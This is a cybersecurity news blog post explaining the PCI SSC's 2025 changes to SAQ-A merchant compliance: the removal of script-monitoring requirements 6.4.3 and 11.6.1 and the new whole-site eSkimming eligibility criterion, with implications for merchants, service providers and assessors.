Cyberbytes Daily

Important Updates to SAQ-A Merchant Compliance Requirements

Important Updates to SAQ-A Merchant Compliance Requirements

The PCI Security Standards Council (PCI SSC) has introduced significant updates to the Self-Assessment Questionnaire A (SAQ-A), which take effect as of March 31, 2025. These changes impact merchant eligibility requirements and compliance obligations, sparking discussions within the PCI community about what this means for merchants, Service Providers (SPs), and Qualified Security Assessors (QSAs).

Overview of the Changes

The latest update to SAQ-A involves adjustments to the compliance requirements for e-commerce businesses that outsource cardholder data processing. Specifically:

  1. Removal of Explicit Requirements:
    • PCI DSS requirements 6.4.3 and 11.6.1—which mandate the inventory, justification, and control of scripts on payment pages, as well as the weekly monitoring of HTTP headers—are no longer explicitly required for SAQ-A merchants.
    • Requirement 12.3.1 for conducting a Targeted Risk Analysis to support Requirement 11.6.1 has also been removed.
  2. New Eligibility Criteria:
    • Merchants must now confirm that their entire e-commerce site (not just the payment page) is secure and not vulnerable to attacks from malicious scripts, including first-party, third-party, and external scripts that could compromise e-commerce systems.
    • This requirement introduces a broad, high-standard obligation for ensuring protection against eSkimming and similar threats, even without the specific compliance steps outlined in 6.4.3 and 11.6.1.
  3. Two SAQ-A Versions:
    • The PCI SSC has released two versions of SAQ-A:
      • The version published in October 2024, which will remain valid until March 31, 2025.
      • A new version, published in January 2025, which reflects these updates and becomes mandatory on March 31, 2025.

“If a merchant is planning to continue using SAQ A in the future, they will now need to ensure that the way they protect against script-originated attacks covers the whole site and not just the payment page. If they can’t do this, they won’t meet the new eligibility criteria, and so they’ll likely need to complete SAQ A-EP instead. This would be a huge uplift, going from 27 applicable requirements in future SAQ A, up to 151 requirements and sub-requirements in SAQ A-EP.” – Gareth Bowker (Jscramber)

What Has Changed and Why It Matters

While removing explicit requirements 6.4.3 and 11.6.1 may seem like a relaxation, the underlying security expectations remain stringent. Merchants eligible for SAQ-A must still implement robust eSkimming protections and script controls to meet the new eligibility criteria.

Key points include:

  • Eligibility Is Limited: Only a small subset of merchants—those who fully outsource all cardholder data processing (e.g., e-commerce merchants relying entirely on third-party service providers)—qualify for SAQ-A. Most merchants across Levels 1, 2, 3, and most of Level 4 must still fully comply with 6.4.3 and 11.6.1.
  • Circular Compliance Challenge: Although 6.4.3 and 11.6.1 are no longer explicitly required for SAQ-A, merchants need script inventory, monitoring, and controls to meet the new eligibility requirement of securing their site from vulnerabilities. This effectively necessitates adherence to the principles of these requirements, even in their absence.

What Hasn’t Changed

  1. Compliance Deadlines Remain Unchanged:
    • The deadline for compliance with PCI DSS v4.0.1, including requirements 6.4.3 and 11.6.1, remains March 31, 2025. This applies to all merchants not eligible for SAQ-A.
  2. No Changes for Service Providers:
    • SPs must continue to comply with 6.4.3 and 11.6.1, ensuring script inventory, monitoring, and the security of payment flows.
  3. SAQ-A Merchants Still Need Robust Protections:
    • While the compliance process may appear simplified, the expectation of preventing vulnerabilities (e.g., skimming attacks) remains.

Implications for Stakeholders

For SAQ-A Merchants

  • Eligibility Challenges:
    • To qualify for SAQ-A, merchants must confirm their site is not vulnerable to script-based attacks. Merchants cannot meet this eligibility requirement without proper script controls and monitoring.
    • Merchants unable to meet these criteria must switch to other Self-Assessment Questionnaires (SAQs) that require full compliance with 6.4.3 and 11.6.1, most likely SAQ A-EP.
  • Security Remains Key:
    • The removal of explicit requirements does not eliminate the obligation to secure e-commerce systems. Robust eSkimming protections are essential to safeguard customer data and maintain compliance.

For Service Providers

  • Support Your Merchants:
    • Educate small merchants about the importance of script controls and guide them toward solutions that meet compliance requirements.
    • Small merchant clients may misinterpret these updates as a relaxation of obligations, leaving them vulnerable to attacks. Use this opportunity to position yourself as a trusted partner by offering low-burden, cost-effective solutions.
  • Expand Your Offerings:
    • Generate additional revenue by introducing value-added services that simplify compliance for merchants while enhancing their security posture.

For QSAs

  • Educate and Clarify:
    • Merchants may mistakenly believe that the removal of 6.4.3 and 11.6.1 means fewer security obligations. QSAs must emphasize that the expectation to secure e-commerce environments remains even though explicit requirements have been removed.
  • Provide Actionable Solutions:
  • Address FAQ-1331 Concerns:
    • Clarify that Level 1 merchants cannot misuse the updated SAQ-A to bypass compliance with 6.4.3 and 11.6.1. The circular compliance logic ensures that eSkimming protections are required even for SAQ-A eligibility.

Summary of Key Takeaways

Opportunities for Collaboration: Service Providers and QSAs can be vital in guiding merchants through these changes and implementing effective solutions.

Changes to SAQ-A: The removal of explicit requirements 6.4.3 and 11.6.1 applies only to a small subset of merchants who meet strict SAQ-A eligibility criteria.

Security Expectations Remain: SAQ-A merchants must implement robust protections against script-based vulnerabilities.

Deadline Remains Firm: All merchants must comply with PCI DSS v4.0.1 by March 31, 2025.

You can find the full article on the PCI Council website here.

The post Important Updates to SAQ-A Merchant Compliance Requirements appeared first on .

Tags

About Author

Chad Barr

Chad Barr is a visionary and executive leader, blending over two decades of expertise with a unique ability to demystify complex technical concepts. As a cybersecurity leader, prolific author, and director at AccessIT Group, Chad has empowered organizations across diverse industries to build resilient security frameworks. His engaging writing, speaking engagements, and thought leadership inspire proactive cybersecurity practices, making him a trusted voice in the ever-evolving digital landscape.

My Books

Latest Posts

Categories

Tags

AI AWS Briefing ChatGPT Credit Card Fraud Cybercriminals Cyber News Cyber Security Cybersecurity News Data Breach Data Protection Digital Transformation Gen AI IoT Nation-State Payment Security PCI DSS Privacy Ransomware Security Skimmer Malware Starbucks